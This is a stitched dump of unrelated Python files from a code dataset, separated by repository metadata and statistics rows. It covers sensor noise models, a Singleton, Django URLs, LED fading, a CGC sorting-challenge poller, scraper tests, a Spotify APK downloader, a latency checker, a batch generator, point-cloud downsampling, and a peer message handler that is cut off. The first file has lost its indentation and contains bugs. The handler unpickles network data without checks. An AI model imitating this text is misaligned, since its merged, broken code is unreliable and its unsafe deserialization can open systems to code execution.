# sensor object to inherit for different sensors
class Sensor:
def __init__(self, name, mean, cov, state):
self.name_ = name
# add the sensor noise characteristics
self.mean_ = mean
self.cov_ = cov
self.H = None
self.stateSize_ = state.shape[0]
# simulate an update step
def measure(self, state):
# h(x) is the measurement model based off of the state
measurement = self.model(state) + np.random.normal(self.mean_, self.cov_)
return measurement
# the sensor model function producing prediction h(x)
def model(self, state):
# return the x value of the current state
prediction = np.zeros_like(state)
if self.H is not None:
# perform the prediction based on the state
prediction = self.H @ state
else:
# alert user if H is undefined
print("Sensor jacobian H is not defined for {0}".format(self.name_))
return prediction
def innovation(self, predict, measurement):
return measurement - predict
# plot a function with the current sensor noise model
def testPlot(self, function=lambda x: 2*x, start=0, end=1, step=100, plot=True):
# create an array of x values to graph
x = np.linspace(start, end, step)
signal = function(x)
# corrupt the sensor
mu = np.random.normal(self.mean_, self.cov_, size=x.shape)
# plot the sensor readings
if plot:
plt.plot(x, signal, "r", label="signal")
plt.plot(x, signal + mu, "b", label="noise")
plt.title("Noise Sample for Sensor {0}".format(self.name_))
plt.legend()
plt.show()
return signal, signal + mu
class OdometrySensor(Sensor):
def __init__(self, name, mean, cov, state):
super().__init__(name, mean, cov, state)
# the odometer senses (indirectly) the movement in the x direction
self.H = np.zeros(self.stateSize_)
self.H[0] = 1
class GyroSensor(Sensor):
def __init__(self, name, mean, cov, state):
super().__init__(name, mean, cov, state)
# the gyro is detecting the yaw
self.H = np.zeros(self.stateSize)
self.H[2] = 1
if __name__ == '__main__':
sense = Sensor("odom", 0, 0.2, np.zeros(3))
sense.testPlot() | 33.527778 | 84 | 0.610605 | 2,217 | 0.918393 | 0 | 0 | 0 | 0 | 0 | 0 | 674 | 0.279205 |
d30c75900993a0da1695f71222f8a200a1c99170 | 52 | py | Python | tests/__init__.py | frenck/python-ambee | 0a03b66d2fd4aca789a44874365bf85ac3469b23 | [
"MIT"
] | 6 | 2021-06-08T19:27:01.000Z | 2022-02-11T00:28:11.000Z | tests/__init__.py | frenck/python-ambee | 0a03b66d2fd4aca789a44874365bf85ac3469b23 | [
"MIT"
] | 200 | 2021-06-08T19:54:54.000Z | 2022-03-30T08:15:20.000Z | tests/__init__.py | frenck/python-ambee | 0a03b66d2fd4aca789a44874365bf85ac3469b23 | [
"MIT"
] | 4 | 2021-06-14T18:04:06.000Z | 2022-02-11T00:28:14.000Z | """Asynchronous Python client for the Ambee API."""
| 26 | 51 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 51 | 0.980769 |
d30d285c95be78b147e1c63701ce89103c7e9604 | 458 | py | Python | Singleton.py | cxwithyxy/PythonSingleton | 6a3b83dccb90548a2324914d3c9c96dcee9c5008 | [
"MIT"
] | null | null | null | Singleton.py | cxwithyxy/PythonSingleton | 6a3b83dccb90548a2324914d3c9c96dcee9c5008 | [
"MIT"
] | null | null | null | Singleton.py | cxwithyxy/PythonSingleton | 6a3b83dccb90548a2324914d3c9c96dcee9c5008 | [
"MIT"
] | null | null | null | #coding:utf-8
import threading
class Singleton(object):
def __new__(cls, *args, **kwargs):
lock = threading.Lock()
lock.acquire()
if not hasattr(cls, "_instance"):
cls._instance = object.__new__(cls)
cls._instance.__Singleton_Init__(*args, **kwargs)
lock.release()
return cls._instance
def __Singleton_Init__(self):
raise RuntimeError("__Singleton_Init__ must be overwritten") | 30.533333 | 68 | 0.641921 | 427 | 0.932314 | 0 | 0 | 0 | 0 | 0 | 0 | 64 | 0.139738 |
d30e8ef63f3e0580a4e7dd8d495cc791edee4584 | 661 | py | Python | api/tacticalrmm/integrations/bitdefender/urls.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | 1 | 2021-12-29T07:20:57.000Z | 2021-12-29T07:20:57.000Z | api/tacticalrmm/integrations/bitdefender/urls.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | null | null | null | api/tacticalrmm/integrations/bitdefender/urls.py | subzdev/tacticalrmm | 21d8899e9a01f0939ab908e82e1205fa7b632caf | [
"MIT"
] | 1 | 2021-12-29T05:55:53.000Z | 2021-12-29T05:55:53.000Z | from django.urls import path, include
from . import views
urlpatterns = [
path('endpoints/', views.GetEndpoints.as_view()),
path('endpoint/<str:endpoint_id>/', views.GetEndpoint.as_view()),
path('packages/', views.GetPackages.as_view()),
path('endpoint/quickscan/<str:endpoint_id>/', views.GetQuickScan.as_view()),
path('endpoint/fullscan/<str:endpoint_id>/', views.GetFullScan.as_view()),
path('endpoint/quarantine/<str:endpoint_id>/', views.GetEndpointQuarantine.as_view()),
path('quarantine/', views.GetQuarantine.as_view()),
path('tasks/', views.GetTasks.as_view()),
path('reports/', views.GetReportsList.as_view())
] | 44.066667 | 90 | 0.708018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 200 | 0.302572 |
d30ef59b6bfbce01484200ba0d96a79b9b8117f5 | 670 | py | Python | libcoop.py | jethornton/coop4 | 5cdbbbb089399ba036798e92887c8ed265d887d0 | [
"MIT"
] | null | null | null | libcoop.py | jethornton/coop4 | 5cdbbbb089399ba036798e92887c8ed265d887d0 | [
"MIT"
] | null | null | null | libcoop.py | jethornton/coop4 | 5cdbbbb089399ba036798e92887c8ed265d887d0 | [
"MIT"
] | null | null | null | class Ledfade:
def __init__(self, *args, **kwargs):
if 'start' in kwargs:
self.start = kwargs.get('start')
if 'end' in kwargs:
self.end = kwargs.get('end')
if 'action' in kwargs:
self.action = kwargs.get('action')
self.transit = self.end - self.start
def ledpwm(self, p):
c = 0.181+(0.0482*p)+(0.00323*p*p)+(0.0000629*p*p*p)
if c < 0.0:
return 0
if c > 0.0 and c <= 100.0:
return c
elif c > 100.0:
return 100
def update(self, now):
if self.action == 'sunrise':
return self.ledpwm(((now - self.start) / self.transit) * 100)
elif self.action == 'sunset':
return self.ledpwm(100 - ((now - self.start) / self.transit) * 100)
| 26.8 | 70 | 0.613433 | 669 | 0.998507 | 0 | 0 | 0 | 0 | 0 | 0 | 57 | 0.085075 |
d310ad1d90c8db21e7972f44e9934db99a3126dd | 6,612 | py | Python | challenges/Sorter/poller/for-release/machine.py | pingjuiliao/cb-multios | 64ededd0b87030eda7c40c4388a4ad8283712d8e | [
"MIT"
] | 473 | 2016-08-01T12:48:16.000Z | 2022-03-09T18:13:14.000Z | challenges/Sorter/poller/for-release/machine.py | pingjuiliao/cb-multios | 64ededd0b87030eda7c40c4388a4ad8283712d8e | [
"MIT"
] | 71 | 2016-08-01T03:33:44.000Z | 2022-03-09T18:37:04.000Z | challenges/Sorter/poller/for-release/machine.py | pingjuiliao/cb-multios | 64ededd0b87030eda7c40c4388a4ad8283712d8e | [
"MIT"
] | 121 | 2016-08-01T04:07:53.000Z | 2022-03-07T11:08:09.000Z | from generator.actions import Actions
import random
import string
import struct
import numpy as np
import math
import datetime as dt
import ctypes
def kaprica_mixin(self):
if hasattr(self, 'xlat_seed'):
return
def xlat_seed(seed):
def hash_string(seed):
H = 0x314abc86
for c in seed:
H = (H * 37) & 0xffffffff
H ^= ord(c)
H = ((H << 13) ^ (H >> 19)) & 0xffffffff
return H
def hash_iterate(H):
H = (H * 3) & 0xffffffff
H = ((H << 13) ^ (H >> 19) ^ (H >> 21)) & 0xffffffff
return H
xmap = list(xrange(256))
xmap_inv = list(xrange(256))
state = hash_string(seed)
for i in xrange(255, 0, -1):
j = state % i
state = hash_iterate(state)
xmap[i], xmap[j] = xmap[j], xmap[i]
for i in xrange(256):
xmap_inv[xmap[i]] = i
self.xlat_map = xmap
self.xlat_map_inv = xmap_inv
self.xlat_seed = xlat_seed
self.xlat_map = None
self.xlat_map_inv = None
def xlat_string(s, inverse=False):
if inverse:
return ''.join([chr(self.xlat_map_inv[ord(c)]) for c in s])
return ''.join([chr(self.xlat_map[ord(c)]) for c in s])
self.xlat_string = xlat_string
def read(delim=None, length=None, expect=None):
if self.xlat_map:
if delim:
delim = self.xlat_string(delim)
if expect:
expect = self.xlat_string(expect)
return self._original_read(delim=delim, length=length, expect=expect)
self._original_read = self.read
self.read = read
def write(s):
if self.xlat_map:
if s:
s = self.xlat_string(s)
return self._original_write(s)
self._original_write = self.write
self.write = write
def random_word(max_size=10, min_size=2):
if random.randint(0,4):
characters = string.letters + string.digits
else:
characters = string.letters
max_size = max_size if max_size >= min_size else min_size
max_size = random.randint(min_size, max_size)
return ("".join(random.choice(characters) for c in range(max_size))).lower()
def random_text(max_words=10, min_words=3):
max_words = max_words if max_words >= min_words else min_words
text = ''
for x in xrange(random.randint(min_words, max_words)):
text += random_word() + ' '
return text
class Cs10Fun(Actions):
def _read(self, data):
self.read(length=len(data), expect=data)
def _read_array(self, array=None):
if not array:
array = self._cur_array
if not len(array):
self._read("Empty Array\n")
else:
self._read("Array data\n")
temp_list = []
for val in array:
temp_list.append("%d, " % val)
temp_list[-1] = temp_list[-1][:-2]
self._read("[" + ''.join(temp_list) + ']\n')
def start(self):
#self.delay(100)
kaprica_mixin(self)
self.xlat_seed('2e0715f1709c')
self.write(self.magic_page[:4])
self.read(length=0x1000, expect=self.magic_page)
self._cur_array = []
self._read("Welcome to CS10Fun!\n")
self._read("Today's lesson is on sorting! We're going to cover 4 types of sorts.\n")
self._read("Before we begin, create an array of ints\n")
self.menu()
self.enter_array()
def menu(self):
self._read("Main Menu\n")
self._read("1. Enter Array\n")
self._read("2. Multiply Array\n")
self._read("3. Try Insertion Sort\n")
self._read("4. Try Selection Sort\n")
self._read("5. Try Heap Sort\n")
self._read("6. Try Merge Sort\n")
self._read("7. Reprint Array\n")
self._read("0. Exit\n")
self._read(" -----\n")
self._read("Current Number of items in array = %d\n" % len(self._cur_array))
#self._read_array()
self._read(" -----\n")
self._read("Make a selection\n")
def enter_array(self):
self.write('1\n')
self._read("Enter a list of numbers to sort. End the list with ';;'\n")
self._cur_array = []
for x in xrange(random.randint(1,100)):
self._cur_array.append(random.randint(-1000000000, 1000000000))
self.write(','.join([str(x) for x in self._cur_array]) + ',;;\n')
self._read("New Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def multiply_array(self):
self.write('2\n')
if len(self._cur_array) > 10000:
self._read("Array is too long. Can't multiply any more\n")
elif len(self._cur_array):
self._read("Quick Grow! Enter a list multiplier. End number with ';'\n")
multiplier = random.randint(1,3)
while multiplier * len(self._cur_array) > 1024 and multiplier * len(self._cur_array) <= 1048:
multiplier = random.randint(1,3)
self.write("%d;\n" % multiplier)
self._cur_array *= multiplier
self._read("Multiplied Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def insert_sort(self):
self.write('3\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Insertion sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def selection_sort(self):
self.write('4\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Selection sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def heap_sort(self):
self.write('5\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Heap sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def merge_sort(self):
self.write('6\n')
self._read_array(sorted(self._cur_array))
#self.read(expect='Merge sort takes [\d]+ operations\n', expect_format='pcre', delim='\n')
self.read(delim='\n')
def reprint_array(self):
self.write('7\n')
self._read("Current Array\n")
self._read("Number of items in array = %d\n" % len(self._cur_array))
self._read_array()
def exit(self):
self.write('0\n')
self._read("Thanks for joining us\n")
self._read("See you next time\n")
| 34.259067 | 105 | 0.576528 | 4,114 | 0.622202 | 0 | 0 | 0 | 0 | 0 | 0 | 1,314 | 0.19873 |
d310ad4131bb13a49700299f40080306d0be5ffa | 267 | py | Python | KanoTerminator.py | JJFReibel/KanoTerminator | 2de8b310fcf39b270d0d65dfb18c26ed8b2b621b | [
"MIT"
] | null | null | null | KanoTerminator.py | JJFReibel/KanoTerminator | 2de8b310fcf39b270d0d65dfb18c26ed8b2b621b | [
"MIT"
] | null | null | null | KanoTerminator.py | JJFReibel/KanoTerminator | 2de8b310fcf39b270d0d65dfb18c26ed8b2b621b | [
"MIT"
] | null | null | null | # Kano or Terminator
# By Jean-Jacques F. Reibel
# I will not be held responsible for:
# any shenanigans
import os
# ಠ_ಠ
# ¯¯\_(ツ)_/¯¯
# (╭ರ_•́)
os.system("printf '\e[0;35;1;1m (╭ರ_'")
os.system("printf '\e[0;31;1;5m°'")
os.system("printf '\e[0;35;1;1m)\n'")
| 20.538462 | 46 | 0.599251 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 235 | 0.813149 |
d311d6b8624998ffd42ae72c0e0a5667ee9aa1ef | 4,754 | py | Python | tests/test_leggins_list.py | ButterflyBug/Affordable-leggins | 0031fb06796e47c6fbf7b38fd226d0365c2ca98f | [
"MIT"
] | 3 | 2019-10-17T09:52:46.000Z | 2020-12-28T10:41:34.000Z | tests/test_leggins_list.py | ButterflyBug/Affordable-leggins | 0031fb06796e47c6fbf7b38fd226d0365c2ca98f | [
"MIT"
] | 2 | 2019-10-29T21:09:44.000Z | 2021-06-10T18:11:50.000Z | tests/test_leggins_list.py | ButterflyBug/Affordable-leggins | 0031fb06796e47c6fbf7b38fd226d0365c2ca98f | [
"MIT"
] | null | null | null | import pytest
from affordable_leggins.leggins_list import get_rrp_from_single_site
from affordable_leggins.leggins_list import get_list_of_leggins_from_page
from affordable_leggins.leggins_list import get_list_of_leggins
from affordable_leggins.store import store_data, read_data, read_data_from_database
from affordable_leggins.storage.models import Leggin, Size
import json
import os
import datetime
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_rrp_from_single_site_when_rrp_available():
""" Test function when rrp found on the website """
assert get_rrp_from_single_site(12068050) == 179.0
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_rrp_from_single_site_when_rrp_not_available():
""" Test function when there is no rrp """
assert get_rrp_from_single_site(12053031) is None
@pytest.mark.vcr()
def test_get_rrp_from_single_site_when_leggin_not_available():
""" Test function when there is no product """
assert get_rrp_from_single_site(99999999) is None
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_list_of_leggins_from_existing_page():
""" Test function when page exists """
single_leggin = {
"leggin_id": "12068050",
"leggin_name": "Legginsy Curve - Szare",
"leggin_price": 162.0,
"leggin_rrp": 179.0,
"sizes": ["XXS", "XS", "S", "M", "L", "XL", "XXL"],
}
matched_leggin = list(
filter(
lambda leggin: leggin["leggin_id"] == "12068050",
get_list_of_leggins_from_page(1),
)
)
assert matched_leggin[0] == single_leggin
@pytest.mark.vcr()
def test_get_list_of_leggins_from_nonexisting_page():
""" Test function when page does not exist """
assert get_list_of_leggins_from_page(120) == []
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_get_list_of_leggins():
"""
Test if leggin from available pages can be found
in a list of all leggins
"""
list_of_leggins = get_list_of_leggins()
leggin_from_first_page = {
"leggin_id": "12068050",
"leggin_name": "Legginsy Curve - Szare",
"leggin_price": 162.0,
"leggin_rrp": 179.0,
"sizes": ["XXS", "XS", "S", "M", "L", "XL", "XXL"],
}
leggin_from_second_page = {
"leggin_name": "Dżersejowe Legginsy MP - Danger",
"leggin_id": "12459914",
"leggin_price": 119.0,
"leggin_rrp": 119.0,
"sizes": ["L", "XL", "XXL"],
}
assert leggin_from_first_page in list_of_leggins
assert leggin_from_second_page in list_of_leggins
@pytest.mark.vcr("tests/cassettes/test_leggins_list/test_get_list_of_leggins.yaml")
def test_store_data():
"""Tests if file with data is created and checks existing of a product"""
leggin_in_file = {
"leggin_id": "12068050",
"leggin_name": "Legginsy Curve - Szare",
"leggin_price": 162.0,
"leggin_rrp": 179.0,
"sizes": ["XXS", "XS", "S", "M", "L", "XL", "XXL"],
}
file = store_data("tests/data/test_leggins_list")
file_path = os.path.abspath(file.name)
opened_file = open(file_path, "r")
loaded_elements = json.load(opened_file)
assert leggin_in_file in loaded_elements
def test_read_data():
leggin = {
"leggin_name": "Legginsy siatkowe Power",
"leggin_id": "11869780",
"leggin_price": 179.0,
"leggin_rrp": 179.0,
}
leggins_list = read_data("tests/data/test_leggins_list", "04", "06", "2019")
assert leggins_list[1] == leggin
def test_read_data_with_integer_values():
leggin = {
"leggin_name": "Legginsy siatkowe Power",
"leggin_id": "11869780",
"leggin_price": 179.0,
"leggin_rrp": 179.0,
}
leggins_list = read_data("tests/data/test_leggins_list", 4, 6, 2019)
assert leggins_list[1] == leggin
@pytest.mark.django_db
def test_read_data_from_database():
leggin = Leggin()
leggin.name = "Legginsy siatkowe Power"
leggin.external_id = "11869780"
leggin.price = 179.0
leggin.rrp = 179.0
leggin.date = datetime.date(2020, 3, 22)
leggin.save()
size = Size()
size.name = "S"
size.save()
leggin.sizes.add(size)
converted_leggin = {
"leggin_name": "Legginsy siatkowe Power",
"leggin_id": 11869780,
"leggin_price": 179.0,
"leggin_rrp": 179.0,
"sizes": ["S"],
}
assert read_data_from_database(22, 3, 2020) == [converted_leggin]
@pytest.mark.django_db
def test_read_data_from_database_non_existing_data():
assert read_data_from_database(22, 3, 2050) == []
| 31.071895 | 83 | 0.676904 | 0 | 0 | 0 | 0 | 3,702 | 0.778549 | 0 | 0 | 1,602 | 0.336909 |
d311f594d2a844e6d5e6617c53d3b5bdd083d897 | 2,665 | py | Python | spotify_gender_ex/downloader.py | Theta-Dev/Spotify-Gender-Ex | 4e5360f115cb3302397b8e1ad1b11ad96b887ad2 | [
"MIT"
] | 1 | 2022-02-05T16:40:13.000Z | 2022-02-05T16:40:13.000Z | spotify_gender_ex/downloader.py | Theta-Dev/Spotify-Gender-Ex | 4e5360f115cb3302397b8e1ad1b11ad96b887ad2 | [
"MIT"
] | 31 | 2021-06-17T11:59:33.000Z | 2022-03-19T07:05:18.000Z | spotify_gender_ex/downloader.py | Theta-Dev/Spotify-Gender-Ex | 4e5360f115cb3302397b8e1ad1b11ad96b887ad2 | [
"MIT"
] | null | null | null | import os
import re
import urllib.request
import click
import requests
from tqdm import tqdm
URL_UPTODOWN = 'https://spotify.de.uptodown.com/android/download'
URL_GHAPI = 'https://api.github.com/repos/Theta-Dev/Spotify-Gender-Ex/commits/master'
URL_RTABLE = 'https://raw.githubusercontent.com/Theta-Dev/Spotify-Gender-Ex/%s/spotify_gender_ex/res/replacements.json'
class Downloader:
def __init__(self, download_id=''):
pattern_url = re.escape('https://dw.uptodown.com/dwn/') + r'(\w|\.|\/|-|\+|=)+'
pattern_version = r'(?<=<div class=version>)(\d|\.)+'
if download_id:
url = URL_UPTODOWN + '/' + download_id
else:
url = URL_UPTODOWN
try:
r = requests.get(url)
except Exception:
msg = 'Spotify-Version konnte nicht abgerufen werden'
click.echo(msg)
self.spotify_version = 'NA'
self.spotify_url = ''
return
search_url = re.search(pattern_url, r.text)
search_version = re.search(pattern_version, r.text)
if not search_url or not search_version:
msg = 'Spotify-Version nicht gefunden'
click.echo(msg)
self.spotify_version = 'NA'
self.spotify_url = ''
return
self.spotify_url = str(search_url[0])
self.spotify_version = str(search_version[0])
def download_spotify(self, output_path):
if not self.spotify_url:
return False
return _download(self.spotify_url, output_path, 'Spotify')
@staticmethod
def get_replacement_table_raw():
try:
# Get latest commit
sha = requests.get(URL_GHAPI).json()['sha']
return requests.get(URL_RTABLE % sha).text
except Exception:
click.echo('Ersetzungstabelle konnte nicht abgerufen werden. Verwende eingebaute Tabelle.')
# See here
# https://stackoverflow.com/questions/15644964/python-progress-bar-and-downloads
class _DownloadProgressBar(tqdm):
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
def _download(url, output_path, description=''):
if description:
click.echo('Lade %s herunter: %s' % (description, url))
else:
click.echo('Herunterladen: ' + url)
try:
with _DownloadProgressBar(unit='B', unit_scale=True, miniters=1, desc=url.split('/')[-1]) as t:
urllib.request.urlretrieve(url, filename=output_path, reporthook=t.update_to)
except Exception:
return False
return os.path.isfile(output_path)
| 31.72619 | 119 | 0.630394 | 1,724 | 0.646904 | 0 | 0 | 336 | 0.126079 | 0 | 0 | 660 | 0.247655 |
d311fd05faa731dc82945e27c74b23f364dcc345 | 2,408 | py | Python | robopager/check_type/intraday_latency_check.py | equinoxfitness/robopager | 34bfbfe78d1e310462d781388aabc4a4392ff48a | [
"MIT"
] | 1 | 2020-11-17T17:31:15.000Z | 2020-11-17T17:31:15.000Z | robopager/check_type/intraday_latency_check.py | equinoxfitness/robopager | 34bfbfe78d1e310462d781388aabc4a4392ff48a | [
"MIT"
] | null | null | null | robopager/check_type/intraday_latency_check.py | equinoxfitness/robopager | 34bfbfe78d1e310462d781388aabc4a4392ff48a | [
"MIT"
] | 3 | 2020-03-06T19:43:43.000Z | 2020-03-30T20:01:56.000Z | # Intraday latency check function
from datetime import datetime
import pytz
from datacoco_batch.batch import Batch
from datacoco_core.logger import Logger
log = Logger()
def convert_time(t):
# convert naive datetime object to utc aware datetime
utc = pytz.utc
timetz = utc.localize(t)
return timetz
class CheckWF:
"""
Calls batchy endpoint to get job status.
"""
def __init__(self, wf, batchy_server, batchy_port):
self.b = Batch(wf, batchy_server, batchy_port)
log.l("Checking wf: {}".format(wf))
def check_batchy_wf(self, max_latency):
status = self.b.get_status().get("global")
if status:
failure_count, result = self.calc_latency_tests(
status, max_latency
)
else:
raise ValueError("Could not find wf")
return failure_count, result
@staticmethod
def calc_latency_tests(result, max_latency):
"""
run business logic on result to create alerts
:param result:
:param max_latency:
:return:
"""
failure_count = 0
# use batch start, not end
batch_start = result.get("batch_start")
latency = (
datetime.now(pytz.utc)
- convert_time(
datetime.strptime(batch_start, "%Y-%m-%dT%H:%M:%S.%f")
)
).seconds / 60
if latency >= max_latency:
log.l(
"latency: {} is greater than max latency: {}".format(
latency, max_latency
)
)
failure_count = 1
result["alert_level"] = "FAILURE"
result["alert_message"] = "latency issue"
elif result["status"] == "failure":
log.l("failure b/c of job failure")
result["alert_level"] = "FAILURE"
result["alert_message"] = "job failure"
elif latency >= max_latency * 0.8:
log.l(
"latency: {} is greater than 80% of max latency: {}".format(
latency, max_latency
)
)
result["alert_level"] = "WARNING"
result["alert_message"] = "passed 80% of latency threshold"
else:
result["alert_level"] = "SUCCESS"
log.l("Success")
result["latency"] = latency
return failure_count, result
| 28.329412 | 76 | 0.550664 | 2,085 | 0.865864 | 0 | 0 | 1,519 | 0.630814 | 0 | 0 | 738 | 0.306478 |
d313915d061fa34def9177d5f7b820de9a9fdfa5 | 3,633 | py | Python | data_util.py | imalikshake/StyleNet | b3e2a0de1e9503cfc3b5aca1748085b9b3a97c1a | [
"CC-BY-4.0"
] | 202 | 2017-06-07T17:41:04.000Z | 2022-02-15T02:13:38.000Z | data_util.py | Her-shey/StyleNet | b3e2a0de1e9503cfc3b5aca1748085b9b3a97c1a | [
"CC-BY-4.0"
] | 4 | 2017-07-06T04:16:05.000Z | 2021-06-12T11:01:18.000Z | data_util.py | Her-shey/StyleNet | b3e2a0de1e9503cfc3b5aca1748085b9b3a97c1a | [
"CC-BY-4.0"
] | 44 | 2017-06-07T21:56:51.000Z | 2021-08-06T02:41:35.000Z | import numpy as np
class BatchGenerator(object):
'''Generator for returning shuffled batches.
data_x -- list of input matrices
data_y -- list of output matrices
batch_size -- size of batch
input_size -- input width
output_size -- output width
mini -- create subsequences for truncating backprop
mini_len -- truncated backprop window'''
def __init__(self, data_x, data_y, batch_size, input_size, output_size, mini=True, mini_len=200):
self.input_size = input_size
self.output_size = output_size
self.data_x = data_x
self.data_y = data_y
self.batch_size = batch_size
self.batch_count = len(range(0, len(self.data_x), self.batch_size))
self.batch_length = None
self.mini = mini
self.mini_len = mini_len
def batch(self):
while True:
idxs = np.arange(0, len(self.data_x))
np.random.shuffle(idxs)
# np.random.shuffle(idxs)
shuff_x = []
shuff_y = []
for i in idxs:
shuff_x.append(self.data_x[i])
shuff_y.append(self.data_y[i])
for batch_idx in range(0, len(self.data_x), self.batch_size):
input_batch = []
output_batch = []
for j in xrange(batch_idx, min(batch_idx+self.batch_size,len(self.data_x)), 1):
input_batch.append(shuff_x[j])
output_batch.append(shuff_y[j])
input_batch, output_batch, seq_len = self.pad(input_batch, output_batch)
yield input_batch, output_batch, seq_len
def pad(self, sequence_X, sequence_Y):
current_batch = len(sequence_X)
padding_X = [0]*self.input_size
padding_Y = [0]*self.output_size
lens = [sequence_X[i].shape[0] for i in range(len(sequence_X))]
# lens2 = [sequence_Y[i].shape[0] for i in range(len(sequence_Y))]
#
max_lens = max(lens)
# max_lens2 = max(lens2)
#
# assert max_lens == max_lens2
# print(max_lens)
for i, x in enumerate(lens):
length = x
a = list(sequence_X[i])
b = list(sequence_Y[i])
while length < max_lens:
a.append(padding_X)
b.append(padding_Y)
length+=1
if self.mini:
while length % self.mini_len != 0:
a.append(padding_X)
b.append(padding_Y)
length+=1
sequence_X[i] = np.array(a)
sequence_Y[i] = np.array(b)
# for x in minis:
# mini_X.append(np.array(a[x:min(x+self.mini,x)]))
# mini_Y.append(np.array(b[x:min(x+self.mini,x)]))
# print sequence_X[i].shape
# print sequence_Y[i].shape
# assert all(x.shape == (max_lens, self.input_size) for x in sequence_X)
# assert all(y.shape == (max_lens, self.output_size) for y in sequence_Y)
sequence_X = np.vstack([np.expand_dims(x, 1) for x in sequence_X])
sequence_Y = np.vstack([np.expand_dims(y, 1) for y in sequence_Y])
if not self.mini:
mini_batches = 1
max_lens = max(lens)
else:
mini_batches = length/self.mini_len
max_lens = self.mini_len
sequence_X = np.reshape(sequence_X, [current_batch*mini_batches, max_lens, self.input_size])
sequence_Y = np.reshape(sequence_Y, [current_batch*mini_batches, max_lens, self.output_size])
return sequence_X, sequence_Y, max_lens
| 36.33 | 101 | 0.573631 | 3,612 | 0.99422 | 818 | 0.225158 | 0 | 0 | 0 | 0 | 803 | 0.221029 |
d315ddafc00e303827ed142f393b01062bb40a46 | 720 | py | Python | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | 3 | 2022-01-16T12:43:29.000Z | 2022-01-22T05:21:40.000Z | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | PointCloudClass/down_sample.py | 565353780/pointcloud-manage | 77f16671ec0b88f53cd9fde2538143721f9d3ab6 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import open3d as o3d
def downSample(pointcloud_file_path, down_sample_cluster_num, save_pointcloud_file_path):
print("[INFO][downSample]")
print("\t start down sampling pointcloud :")
print("\t down_sample_cluster_num = " + str(down_sample_cluster_num) + "...")
pointcloud = o3d.io.read_point_cloud(pointcloud_file_path, print_progress=True)
down_sampled_pointcloud = o3d.geometry.PointCloud.uniform_down_sample(
pointcloud, down_sample_cluster_num)
o3d.io.write_point_cloud(
save_pointcloud_file_path,
down_sampled_pointcloud,
write_ascii=True,
print_progress=True)
print("SUCCESS!")
return True
| 31.304348 | 89 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 147 | 0.204167 |
d315fff20454a99b5425854a126c0fa656788a07 | 3,562 | py | Python | congregation/net/handler.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 3 | 2020-10-05T16:30:15.000Z | 2021-01-22T13:38:02.000Z | congregation/net/handler.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | null | null | null | congregation/net/handler.py | CCD-HRI/congregation | a552856b03a64a4295792184107c4e529ca3f4ae | [
"MIT"
] | 1 | 2021-02-19T12:40:57.000Z | 2021-02-19T12:40:57.000Z | import asyncio
import pickle
from congregation.net.messages import *
class Handler:
def __init__(self, peer, server: [asyncio.Protocol, None] = None):
self.peer = peer
self.server = server
self.msg_handlers = self._define_msg_map()
def handle_msg(self, data):
"""
determine message type and handle accordingly
"""
if isinstance(data, Msg):
m = data
else:
m = pickle.loads(data)
if m.pid not in self.peer.peer_connections:
raise Exception(f"Msg of type {m.msg_type} received from unrecognized peer: {m.pid}")
self.msg_handlers[m.msg_type](m)
def _define_msg_map(self):
return {
"IAM": self.handle_iam_msg,
"READY": self.handle_ready_msg,
"CONFIG": self.handle_config_msg,
"ACK": self.handle_ack_msg,
"REQUEST": self.handle_request_msg
}
def _check_dispatcher(self, m: [ReadyMsg, ConfigMsg, AckMsg, RequestMsg]):
if self.peer.dispatcher is not None:
if self.peer.dispatcher.dispatch_type == m.job_type:
return True
self.peer.msg_buffer.append(m)
return False
def handle_iam_msg(self, m: IAMMsg):
"""
we need to be able to resolve which party a given connection
is for, which is why a done callback is added to the connection
future which sends an IAMMsg with the pid of the connecting party.
this function sets that connection value in peer.peer_connections
accordingly when an IAMMsg is received.
"""
print(f"IAMMsg received from {m.pid}")
conn = self.peer.peer_connections[m.pid]
if isinstance(conn, asyncio.Future):
if not conn.done():
conn.set_result((self.server.transport, self))
def handle_ready_msg(self, m: ReadyMsg):
if self._check_dispatcher(m):
print(f"ReadyMsg received from party {m.pid} for {m.job_type} job.")
rdy = self.peer.dispatcher.parties_ready[m.pid]
if isinstance(rdy, asyncio.Future):
if not rdy.done():
rdy.set_result(True)
def handle_config_msg(self, m: ConfigMsg):
if self._check_dispatcher(m):
print(f"ConfigMsg received from party {m.pid} for {m.job_type} job.")
cfg = self.peer.dispatcher.parties_config[m.pid]["CFG"]
if isinstance(cfg, asyncio.Future):
if not cfg.done():
cfg.set_result(m.config)
